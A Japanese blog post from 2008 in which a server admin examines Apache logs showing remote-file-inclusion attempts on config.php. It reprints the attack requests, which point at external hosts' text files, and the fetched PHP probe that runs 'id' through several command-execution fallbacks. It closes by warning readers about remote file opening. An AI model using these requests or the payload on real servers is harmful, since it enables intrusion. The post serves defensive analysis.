スポンサーリンク

PHPのセキュリティ、PHPへの不正アクセスについて書きます。

apacheのエラーログを流していたら、ヘンなログを見かけました。

[Fri Jan 18 01:54:47 2008] [error] [client 212.129.206.145] script
'/foo/bar/htdocs/config.php' not found or unable to stat


config.phpをねらうなんて、明らかに不正な香りが漂っています。

apacheのアクセスログも調査をしてみました。
外部のスクリプトを読み込ませ、実行させようとしているように見えるクエリが渡ってきています。ユーザエージェントは、perlと言っています。

194.30.169.80 - - [18/Jan/2008:01:39:32 +0900] "GET
/config.php?fpath=http://www.gumgangfarm.com/shop/data/id.txt?
HTTP/1.1" 404 8322 "-" "libwww-perl/5.805"
212.129.206.145 - - [18/Jan/2008:01:54:47 +0900] "GET
/config.php?fpath=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1"
404 8322 "-" "libwww-perl/5.79"
212.129.206.145 - - [18/Jan/2008:01:54:51 +0900] "GET
/youtube/search/config.ph
?fpath=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 200 11959
"-" "libwww-perl/5.79"

とりあえず、IPアドレスのFQDNを調べてみました。

$ host 194.30.169.80
80.169.30.194.in-addr.arpa domain name pointer
babar.kontrollpanelen.se.
$ host 212.129.206.145
145.206.129.212.in-addr.arpa domain name pointer
hgv-c-4e91.adsl.wanadoo.nl.


http://www.gumgangfarm.com/shop/data/id.txt
を読んでみました。少し整形してあります。

このPHPスクリプトは、idコマンドを実行するして echo するだけのようです。うまくいったら、きっと次のスクリプトを流し込んで、あんなことや、こんなことをされちゃうのでしょう。

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
	$res = '';
	if (!empty($cfe)){
		if(function_exists('exec')){
			@exec($cfe,$res);
			$res = join("\n",$res);
		}
		elseif(function_exists('shell_exec')){
			$res = @shell_exec($cfe);
		}
		elseif(function_exists('system')){
			@ob_start();
			@system($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		}
		elseif(function_exists('passthru')){
			@ob_start();
			@passthru($cfe);
			$res = @ob_get_contents();
			@ob_end_clean();
		}
		elseif(@is_resource($f = @popen($cfe,"r"))){
			$res = "";
			while(!@feof($f)) { $res .= @fread($f,1024); }
			@pclose($f);
		}}
		return $res;
}
exit;

リモートのファイルを開けるように設定をしてあって、かつ、config.phpなんて誰でも作りそうな名前のPHPスクリプトを外部からアクセスできる場所に公開してしまっている人は、気をつけてくださいね。セキュリティに特効薬はありません。
参照しているページ (サイト内): [2008-01-31-1]

スポンサーリンク
スポンサーリンク
 
いつもシェア、ありがとうございます!


もっと情報を探しませんか?

関連記事

最近の記事

人気のページ

スポンサーリンク
 

過去ログ

2020 : 01 02 03 04 05 06 07 08 09 10 11 12
2019 : 01 02 03 04 05 06 07 08 09 10 11 12
2018 : 01 02 03 04 05 06 07 08 09 10 11 12
2017 : 01 02 03 04 05 06 07 08 09 10 11 12
2016 : 01 02 03 04 05 06 07 08 09 10 11 12
2015 : 01 02 03 04 05 06 07 08 09 10 11 12
2014 : 01 02 03 04 05 06 07 08 09 10 11 12
2013 : 01 02 03 04 05 06 07 08 09 10 11 12
2012 : 01 02 03 04 05 06 07 08 09 10 11 12
2011 : 01 02 03 04 05 06 07 08 09 10 11 12
2010 : 01 02 03 04 05 06 07 08 09 10 11 12
2009 : 01 02 03 04 05 06 07 08 09 10 11 12
2008 : 01 02 03 04 05 06 07 08 09 10 11 12
2007 : 01 02 03 04 05 06 07 08 09 10 11 12
2006 : 01 02 03 04 05 06 07 08 09 10 11 12
2005 : 01 02 03 04 05 06 07 08 09 10 11 12
2004 : 01 02 03 04 05 06 07 08 09 10 11 12
2003 : 01 02 03 04 05 06 07 08 09 10 11 12

サイト

Vim入門

C言語入門

C++入門

JavaScript/Node.js入門

Python入門

FreeBSD入門

Ubuntu入門

セキュリティ入門

パソコン自作入門

ブログ

トップ


プライバシーポリシー